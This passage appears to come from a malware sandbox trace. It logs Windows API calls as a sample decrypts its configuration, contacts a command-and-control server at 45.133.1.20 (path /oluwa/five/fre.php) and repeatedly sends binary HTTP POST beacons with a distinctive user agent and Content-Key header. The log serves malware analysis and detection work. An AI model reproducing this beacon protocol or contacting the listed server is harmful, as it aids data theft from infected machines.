(lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0305.281] GetProcessHeap () returned 0x6a0000 [0305.281] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0305.281] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0305.281] GetProcessHeap () returned 0x6a0000 [0305.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0305.282] GetProcessHeap () returned 0x6a0000 [0305.282] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0305.282] GetProcessHeap () returned 0x6a0000 [0305.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0305.283] GetProcessHeap () returned 0x6a0000 [0305.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0305.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.288] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0305.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.312] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0305.322] GetProcessHeap () returned 0x6a0000 [0305.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0305.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.323] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0305.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.374] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0305.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.376] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0305.376] GetProcessHeap () returned 0x6a0000 [0305.377] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0305.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.378] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0305.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.379] CryptDestroyKey (hKey=0x6ad020) returned 1 [0305.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0305.385] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0305.385] GetProcessHeap () returned 0x6a0000 [0305.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0305.386] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.386] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0305.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.756] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0305.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.757] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0305.817] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0305.818] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0305.818] GetProcessHeap () returned 0x6a0000 [0305.818] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0305.818] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0305.818] GetProcessHeap () returned 0x6a0000 [0305.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0305.819] socket (af=2, type=1, protocol=6) returned 0xb94 [0305.819] connect (s=0xb94, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0305.900] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0305.903] GetProcessHeap () returned 0x6a0000 [0305.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0305.903] GetProcessHeap () returned 0x6a0000 [0305.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0305.904] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0305.905] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0305.905] GetProcessHeap () returned 0x6a0000 [0305.905] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6600 [0305.905] GetProcessHeap () returned 0x6a0000 [0305.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0305.906] GetProcessHeap () returned 0x6a0000 [0305.906] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0305.906] GetProcessHeap () returned 0x6a0000 [0305.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0305.907] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0305.908] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0305.908] GetProcessHeap () returned 0x6a0000 [0305.908] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0305.908] GetProcessHeap () returned 0x6a0000 [0305.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0305.909] send (s=0xb94, buf=0x6bd460*, len=242, flags=0) returned 242 [0305.910] send (s=0xb94, buf=0x6bb998*, len=159, flags=0) returned 159 [0305.910] GetProcessHeap () returned 0x6a0000 [0305.910] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0305.910] recv (in: s=0xb94, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0306.001] GetProcessHeap () returned 0x6a0000 [0306.002] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0306.002] GetProcessHeap () returned 0x6a0000 [0306.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0306.003] GetProcessHeap () returned 0x6a0000 [0306.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6600 | out: hHeap=0x6a0000) returned 1 [0306.004] GetProcessHeap () returned 0x6a0000 [0306.004] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0306.004] closesocket (s=0xb94) returned 0 [0306.005] GetProcessHeap () returned 0x6a0000 [0306.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0306.005] GetProcessHeap () returned 0x6a0000 [0306.005] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0306.005] GetProcessHeap () returned 0x6a0000 [0306.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0306.006] GetProcessHeap () returned 0x6a0000 [0306.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0306.006] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18d0) returned 0xb94 [0306.021] Sleep (dwMilliseconds=0xea60) [0306.022] GetProcessHeap () returned 0x6a0000 [0306.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0306.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.025] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.035] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0306.253] GetProcessHeap () returned 0x6a0000 [0306.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0306.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.265] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0306.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.269] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.276] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.276] GetProcessHeap () returned 0x6a0000 [0306.277] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0306.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.286] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0306.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.362] CryptDestroyKey (hKey=0x6ad020) returned 1 [0306.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.363] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0306.363] GetProcessHeap () returned 0x6a0000 [0306.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0306.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.365] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0306.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.368] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0306.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.369] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0306.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.370] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0306.370] GetProcessHeap () returned 0x6a0000 [0306.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0306.371] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0306.371] GetProcessHeap () returned 0x6a0000 [0306.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0306.373] GetProcessHeap () returned 0x6a0000 [0306.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0306.373] GetProcessHeap () returned 0x6a0000 [0306.373] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0306.373] GetProcessHeap () returned 0x6a0000 [0306.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0306.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.375] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.381] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0306.396] GetProcessHeap () returned 0x6a0000 [0306.396] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0306.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.401] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0306.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.404] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.406] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.406] GetProcessHeap () returned 0x6a0000 [0306.407] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0306.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.411] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0306.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.413] CryptDestroyKey (hKey=0x6ad060) returned 1 [0306.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.414] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0306.415] GetProcessHeap () returned 0x6a0000 [0306.415] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0306.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.416] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0306.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.417] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0306.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.419] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0306.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.420] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0306.420] GetProcessHeap () returned 0x6a0000 [0306.420] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0306.421] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0306.421] GetProcessHeap () returned 0x6a0000 [0306.421] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0306.421] socket (af=2, type=1, protocol=6) returned 0xb98 [0306.421] connect (s=0xb98, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0306.462] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0306.462] GetProcessHeap () returned 0x6a0000 [0306.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0306.462] GetProcessHeap () returned 0x6a0000 [0306.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0306.463] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0306.465] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0306.465] GetProcessHeap () returned 0x6a0000 [0306.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6840 [0306.465] GetProcessHeap () returned 0x6a0000 [0306.466] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0306.466] GetProcessHeap () returned 0x6a0000 [0306.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0306.466] GetProcessHeap () returned 0x6a0000 [0306.466] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0306.467] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0306.468] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0306.468] GetProcessHeap () returned 0x6a0000 [0306.468] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0306.468] GetProcessHeap () returned 0x6a0000 [0306.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0306.469] send (s=0xb98, buf=0x6bd460*, len=242, flags=0) returned 242 [0306.470] send (s=0xb98, buf=0x6bb998*, len=159, flags=0) returned 159 [0306.470] GetProcessHeap () returned 0x6a0000 [0306.470] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0306.470] recv (in: s=0xb98, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0306.540] GetProcessHeap () returned 0x6a0000 [0306.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0306.541] GetProcessHeap () returned 0x6a0000 [0306.542] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0306.543] GetProcessHeap () returned 0x6a0000 [0306.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6840 | out: hHeap=0x6a0000) returned 1 [0306.544] GetProcessHeap () returned 0x6a0000 [0306.544] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0306.545] closesocket (s=0xb98) returned 0 [0306.545] GetProcessHeap () returned 0x6a0000 [0306.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0306.545] GetProcessHeap () returned 0x6a0000 [0306.545] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0306.546] GetProcessHeap () returned 0x6a0000 [0306.546] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0306.551] GetProcessHeap () returned 0x6a0000 [0306.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0306.553] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18d4) returned 0xb98 [0306.555] Sleep (dwMilliseconds=0xea60) [0306.556] GetProcessHeap () returned 0x6a0000 [0306.556] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0306.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.557] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.581] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0306.592] GetProcessHeap () returned 0x6a0000 [0306.592] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0306.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.593] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0306.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.595] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.596] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.596] GetProcessHeap () returned 0x6a0000 [0306.596] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0306.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.601] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0306.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.612] CryptDestroyKey (hKey=0x6ad020) returned 1 [0306.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0306.613] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0306.613] GetProcessHeap () returned 0x6a0000 [0306.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0306.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.615] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0306.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.616] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0306.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.618] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0306.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0306.619] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0306.619] GetProcessHeap () returned 0x6a0000 [0306.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0306.619] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0306.623] GetProcessHeap () returned 0x6a0000 [0306.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0306.623] GetProcessHeap () returned 0x6a0000 [0306.623] HeapFree (in: 